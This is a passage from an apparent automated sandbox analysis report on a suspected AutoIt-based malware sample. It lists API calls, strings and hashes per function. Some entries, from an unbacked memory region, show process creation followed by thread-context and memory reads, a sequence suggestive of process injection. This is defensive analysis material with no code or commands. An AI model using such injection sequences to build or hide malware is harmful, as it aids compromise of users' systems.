                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: d158b2af07d2df6de11881d0006795f118ce40641e90d1b6cb83bbe7a35dd3ea
                        • Instruction ID: 98bcb48bdc13650635e317bffa35d1517632f5e214ff3869e6e43d4b0c7a6342
                        • Opcode Fuzzy Hash: d158b2af07d2df6de11881d0006795f118ce40641e90d1b6cb83bbe7a35dd3ea
                        • Instruction Fuzzy Hash: 95F0B7755503907AEB211717AD08E772EBDD7C6F50F00106EFD04E25B0C6711851DAB8

                        Control-flow Graph

                        APIs
                          • Part of subcall function 013822A0: Sleep.KERNELBASE(000001F4), ref: 013822B1
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013824C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: FQQ67CXOJLHGZHEQ9K
                        • API String ID: 2694422964-116326040
                        • Opcode ID: a4f209a63be537b3ca7b6589b41b930317dc46e838bd55533ee6e10554702ff1
                        • Instruction ID: 6a256b23d79d6812ddc657a5e146854bb6850714bf668557bb42f4814d70effd
                        • Opcode Fuzzy Hash: a4f209a63be537b3ca7b6589b41b930317dc46e838bd55533ee6e10554702ff1
                        • Instruction Fuzzy Hash: 1A516F70D04349DBEF11EBA8C818BEFBB79AF15304F004199E609BB2C1D6B94B49CB65

                        Control-flow Graph

                        APIs
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2C05
                        • DeleteFileW.KERNEL32(?), ref: 003A2C87
                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A2C9D
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2CAE
                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A2CC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: File$Delete$Copy
                        • String ID:
                        • API String ID: 3226157194-0
                        • Opcode ID: a29f8988d726fa184cb456a993f73114c0d0e3c49328d26b932cca064306b7cd
                        • Instruction ID: b1919587a9f808bc2fbe95d643fb35e7b4fba6b6a37b1427cd801eec91444d05
                        • Opcode Fuzzy Hash: a29f8988d726fa184cb456a993f73114c0d0e3c49328d26b932cca064306b7cd
                        • Instruction Fuzzy Hash: 09B15E72D00119ABDF26DBA8CC85EDFB7BDEF09350F1044A6F909EA151EB319A448F61

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: JO3
                        • API String ID: 0-1249764312
                        • Opcode ID: cc9c00e0e069c1c60bb2f46ce627244756a19732b255588aa89a3eda4b5a8649
                        • Instruction ID: f8b41dd9f43bdb2f1638203aa30f6a3a69c52a4e0b4efb2be4dea4c2ac513531
                        • Opcode Fuzzy Hash: cc9c00e0e069c1c60bb2f46ce627244756a19732b255588aa89a3eda4b5a8649
                        • Instruction Fuzzy Hash: EB51B075D0060AAFCF239FA8C945FAEBFB8EF05310F158069F805AB2A5D7719901DB61
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B40
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B61
                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00333B0F,SwapMouseButtons,00000004,?), ref: 00333B83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        • Opcode ID: 8ed34c774835aafb1aff53b4d04c69dc4a7834f1019c271e98a17a7e72f670c5
                        • Instruction ID: 8fb63fa251f6ac1061b473c789ead33196ce2d03a474bbc1b6c138ac7689122d
                        • Opcode Fuzzy Hash: 8ed34c774835aafb1aff53b4d04c69dc4a7834f1019c271e98a17a7e72f670c5
                        • Instruction Fuzzy Hash: 4B112AB5520218FFDB228FA5DC84EAEB7BCEF04744F118459F805D7110D231EE409760
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01381A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01381AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01381B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                        • Instruction ID: c21d6d2eede5ff32c406b01caa512aa9b4fbbf1e2eb980656dee0c5157442a49
                        • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                        • Instruction Fuzzy Hash: 7B620A30A14258DBEB24DFA4C840BEEB776FF58304F1091A9D10DEB294E7799E81CB59
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003733A2
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00333A04
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_wcslen
                        • String ID: Line:
                        • API String ID: 2289894680-1585850449
                        • Opcode ID: 552c7c5b5ba16649ea27456f3ea35f0907927639808ea3de4ffa6e7a452ca88f
                        • Instruction ID: 52dd867cd5ab1c447a32eb929afdef3039bfb1d343310a5a193a336fe7bd94c3
                        • Opcode Fuzzy Hash: 552c7c5b5ba16649ea27456f3ea35f0907927639808ea3de4ffa6e7a452ca88f
                        • Instruction Fuzzy Hash: 8031B471508304AED327EB20DC86FEBB7DCAB40714F10852EF999970A1DB749649C7C6
                        APIs
                        • GetOpenFileNameW.COMDLG32(?), ref: 00372C8C
                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                          • Part of subcall function 00332DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00332DC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Name$Path$FileFullLongOpen
                        • String ID: X$`e?
                        • API String ID: 779396738-120205953
                        • Opcode ID: 902d0b7b29530fec6febb7bf2f560b70efad5d2e127bd0393e02aadc9917be7a
                        • Instruction ID: a08647a86cf70b5c7741f38ee9e50be0ad3252a03f670c2b425926968420999b
                        • Opcode Fuzzy Hash: 902d0b7b29530fec6febb7bf2f560b70efad5d2e127bd0393e02aadc9917be7a
                        • Instruction Fuzzy Hash: 0C21A871A0025C9FDB03EF95C846BEE7BFC9F49304F008059E509BB241DBB855498FA1
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00350668
                          • Part of subcall function 003532A4: RaiseException.KERNEL32(?,?,?,0035068A,?,00401444,?,?,?,?,?,?,0035068A,00331129,003F8738,00331129), ref: 00353304
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00350685
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Exception@8Throw$ExceptionRaise
                        • String ID: Unknown exception
                        • API String ID: 3476068407-410509341
                        • Opcode ID: bed16886f51b08e6c9d596a9029c6876d09517548b59d96dc91240dd202196e1
                        • Instruction ID: 74bf20c3046b6127cf791b60c6b2eefe1438901ffe9a36319f8571908a86aebb
                        • Opcode Fuzzy Hash: bed16886f51b08e6c9d596a9029c6876d09517548b59d96dc91240dd202196e1
                        • Instruction Fuzzy Hash: 00F0283490020D77CB0BB7A4D846C9D77AC9E00341B604830BD14C94B5EF72EA6DC6C0
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 003A302F
                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003A3044
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
                        • Opcode ID: 2d5c6dc921da0cfd9422cd4d97d6b26b208fcae89dfffaa63e2694df721bee0a
                        • Instruction ID: f6bccd1d95f936c5f9f6f02d9b4f4feda6244ad1ef2dc20e8516f25227b581cd
                        • Opcode Fuzzy Hash: 2d5c6dc921da0cfd9422cd4d97d6b26b208fcae89dfffaa63e2694df721bee0a
                        • Instruction Fuzzy Hash: F8D05EB250032867DE20E7A4AC0EFDB3A6CDB04750F0006A1F659E2091DBB0A984CBD0
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003B82F5
                        • TerminateProcess.KERNEL32(00000000), ref: 003B82FC
                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 003B84DD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$CurrentFreeLibraryTerminate
                        • String ID:
                        • API String ID: 146820519-0
                        • Opcode ID: b91215bf523227f73ab60d761ca49f1e2c6a4fe578e75f32d337a7bc4b229422
                        • Instruction ID: 3a896c4514587f31c0b4f08776c4583dddfbb521181d92dc92159fed1383f1fd
                        • Opcode Fuzzy Hash: b91215bf523227f73ab60d761ca49f1e2c6a4fe578e75f32d337a7bc4b229422
                        • Instruction Fuzzy Hash: 25127A71A083019FC725DF28C480B6ABBE9FF85318F05895DE9898B252CB31ED45CF92
                        APIs
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00331BF4
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00331BFC
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00331C07
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00331C12
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00331C1A
                          • Part of subcall function 00331BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00331C22
                          • Part of subcall function 00331B4A: RegisterWindowMessageW.USER32(00000004,?,003312C4), ref: 00331BA2
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0033136A
                        • OleInitialize.OLE32 ref: 00331388
                        • CloseHandle.KERNEL32(00000000,00000000), ref: 003724AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 1986988660-0
                        • Opcode ID: f1255eedcc9612a39be3f73e4b40f64a9df818e6d8139099f2d7e9be1e685260
                        • Instruction ID: d5d620b313ddd8b131fc1bb3b8c1ab8039807e4c501568be2ab60fb1a230defb
                        • Opcode Fuzzy Hash: f1255eedcc9612a39be3f73e4b40f64a9df818e6d8139099f2d7e9be1e685260
                        • Instruction Fuzzy Hash: 9371BFB9911300AFC386EF79AE85A553AE4FB88354754863EE44AFB2B1EB344541CF4C
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,003685CC,?,003F8CC8,0000000C), ref: 00368704
                        • GetLastError.KERNEL32(?,003685CC,?,003F8CC8,0000000C), ref: 0036870E
                        • __dosmaperr.LIBCMT ref: 00368739
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                        • String ID:
                        • API String ID: 490808831-0
                        • Opcode ID: 61f2ce76636dd31cb1fcf53a544ce68eed9ee0d803907d3f1b08d6e1026cc603
                        • Instruction ID: a2b4e3e7df233c8b0465204e4b387440af621f5b20cbdd3e326e6f18be729549
                        • Opcode Fuzzy Hash: 61f2ce76636dd31cb1fcf53a544ce68eed9ee0d803907d3f1b08d6e1026cc603
                        • Instruction Fuzzy Hash: B4018E3670426016C2336334E845B7E27494B8BB74F3A8329FA48DF1DADEF0CC818250
                        APIs
                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,003A2CD4,?,?,?,00000004,00000001), ref: 003A2FF2
                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A3006
                        • CloseHandle.KERNEL32(00000000,?,003A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A300D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: d5ad2f44b97b6dba5cd4c0725a099c264bd6158bce1d0b955faacb455dd10194
                        • Instruction ID: 2731eb235f02f3286c871147dbc2bb7cf1085d7f5f6e35376e24fceab50151df
                        • Opcode Fuzzy Hash: d5ad2f44b97b6dba5cd4c0725a099c264bd6158bce1d0b955faacb455dd10194
                        • Instruction Fuzzy Hash: 38E0863669021077D2321756BC0DF8B3A1CD786B71F154210F71DB50D146A0250143A8
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 003417F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: CALL
                        • API String ID: 1385522511-4196123274
                        • Opcode ID: 646a680cb55e0dd0e1043ca387f063dbbbc2a31655649ebb95bf4d4320f3c4ff
                        • Instruction ID: 0c4493dd2c02044e91d7adeffcaff305e385cc106de173f2bb794c109a3ffa45
                        • Opcode Fuzzy Hash: 646a680cb55e0dd0e1043ca387f063dbbbc2a31655649ebb95bf4d4320f3c4ff
                        • Instruction Fuzzy Hash: A12299706087019FC716DF24C485A2ABBF5BF86314F19896DF4968F3A2D771E981CB82
                        APIs
                        • _wcslen.LIBCMT ref: 003A6F6B
                          • Part of subcall function 00334ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EFD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LibraryLoad_wcslen
                        • String ID: >>>AUTOIT SCRIPT<<<
                        • API String ID: 3312870042-2806939583
                        • Opcode ID: 2b17aa8d80edb27d99f13dd43837048872001f1c310f0de9e9967c318f28a54f
                        • Instruction ID: def1bafe95dff2ef6243fb6a76572b3ccf07bf886dbca26466bca3123bd4342d
                        • Opcode Fuzzy Hash: 2b17aa8d80edb27d99f13dd43837048872001f1c310f0de9e9967c318f28a54f
                        • Instruction Fuzzy Hash: B8B1A3711082019FCB16EF20C8D29AEB7E5FF95310F05895DF4969B262EB30ED49CB92
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID: EA06
                        • API String ID: 2638373210-3962188686
                        • Opcode ID: 55dc342fef1a00a0e62fcc508d4580008322d0a78f854d67f1db545de9ef8d0f
                        • Instruction ID: b4c9829d7f889ad8f2d758b4f110d4e2e0ee5193b592c363e6d19ccdc13cd873
                        • Opcode Fuzzy Hash: 55dc342fef1a00a0e62fcc508d4580008322d0a78f854d67f1db545de9ef8d0f
                        • Instruction Fuzzy Hash: EA01B572D042587EDF19C7A8C856EEEBBF8DB06301F00455AE552D6181E5B4E7088B60
                        APIs
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00333908
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: IconNotifyShell_
                        • String ID:
                        • API String ID: 1144537725-0
                        • Opcode ID: 10dbe7ef84a8d9168d414283614b653f3df40091c74069bac049fac3ae0452cc
                        • Instruction ID: 3080656ad5565d2ac70d2338e629ff9f9e998a75302f362eafc4aaa90d3c813a
                        • Opcode Fuzzy Hash: 10dbe7ef84a8d9168d414283614b653f3df40091c74069bac049fac3ae0452cc
                        • Instruction Fuzzy Hash: 18319170504301DFE722DF24D9C4B97BBE8FB49709F00492EF99997290E771AA48CB92
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0034CF58,?,?,?), ref: 00336DBA
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0034CF58,?,?,?), ref: 00336DED
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide
                        • String ID:
                        • API String ID: 626452242-0
                        • Opcode ID: 20b79263bdb642f368ed9c49c9e1f4d0cf432fd9cd6e651c1bc82ceba2255d98
                        • Instruction ID: 63f6c6433fee50e53f8a94a764140cd65b0cbb63e1924268ad784fd98146ece9
                        • Opcode Fuzzy Hash: 20b79263bdb642f368ed9c49c9e1f4d0cf432fd9cd6e651c1bc82ceba2255d98
                        • Instruction Fuzzy Hash: 9001F2723042007FEB2A5B6ADD8BF6F7AEDDB85300F04403DF106DA1E1E9A1AC008660
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01381A5B
